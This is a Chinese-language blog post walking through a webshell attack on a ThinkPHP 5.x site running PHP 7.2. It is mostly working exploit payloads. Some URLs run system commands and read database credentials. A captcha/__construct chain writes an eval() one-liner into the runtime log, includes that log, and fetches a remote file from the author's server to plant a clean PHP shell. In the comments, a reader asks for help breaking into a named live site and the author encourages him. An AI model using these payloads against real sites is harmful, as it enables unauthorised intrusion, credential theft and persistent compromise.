thinkPHP 5X 在PHP7以上环境下的 GETSHELL

Mr.Wu 12,183 5 正在检测是否收录...

起因

thinkPHP 的命令执行漏洞已经过去好一阵子了,然而还有许多站并没有修复这个漏洞,今天恰巧让我遇到这么一个,

但是因为目标 PHP 版本是 7.2.14 导致 GETSHELL 变的异常麻烦,在各种折腾下最终成功,记录分享一波~

GETSHELL 过程

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/\think\Request/input&filter=phpinfo&data=1

?s=index/think\config/get&name=database.hostname

?s=index/think\config/get&name=database.password

?s=index/\think\Request/input&filter=system&data=id

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

?s=index/\think\view\driver\Php/display&content=<?php%20phpinfo();?>

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

以上这些方法全部行不通,不过在用下面这个方法却能成功显示 phpinfo

/index.php?s=captcha

_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

说明有戏,可以试试,禁用了很多函数,经过各种查阅文档和尝试,最终通过下面的方法 GETSHELL

1.写入 shell 到日志文件中

/?s=captcha

_method=__construct&method=get&filter[]=call_user_func&server[]=-1&get[]=<?php eval($_POST[1337]); ?>

thinkPHP 5X 在PHP7以上环境下的 GETSHELL

2.包含日志文件 GETSHELL

/?s=captcha

_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=./runtime/log/201905/04.log

thinkPHP 5X 在PHP7以上环境下的 GETSHELL

其实这一步就已经可以结束了,但是由于一句话和日志混在一起的,日志又基本很大,导致很麻烦,所以我们还需要在来一个步骤

3.通过一句话 copy 新一句话文件

/?s=captcha

_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=./runtime/log/201905/04.log&1337=echo copy("https://www.mrwu.red/1.txt","/www/wwwroot/test.xxxx.cn/2.php");

thinkPHP 5X 在PHP7以上环境下的 GETSHELL

这样的话,这个 2.PHP 文件中的内容就是我们 1.txt 中的内容,没有其他乱七八糟的东西,舒爽多了

参考

ThinkPHP绕过宝塔getshell

打赏
发表评论 取消回复
表情 图片 链接 代码

  1. 啥都不是

    大神我用您的教的方式 失败了 可以给我提点一下吗?

  2. ddd
    ddd Lv 1

    这个宝塔怎么过,黄站,求日 http://2c3nwpw.cn thinkphp5.0.20 ,禁用invokefunction

    • Mr.Wu
      Mr.Wu Lv 5

      @ddd宝塔限制不严谨,多花点时间,可以搞定的,你在折腾折腾吧

  3. 111
    111 Lv 1

    楼主我想问一下往日志文件里面写的shell那个server参数是干什么用的,是用来报错的还是必须的参数啊?

  4. thinkPHP渗透之经验决定成败 | 0x24bin's Blog

    […] thinkPHP 5X 在PHP7以上环境下的 GETSHELL 2个月前 (05-04)  0 […]

分享
微信
微博
QQ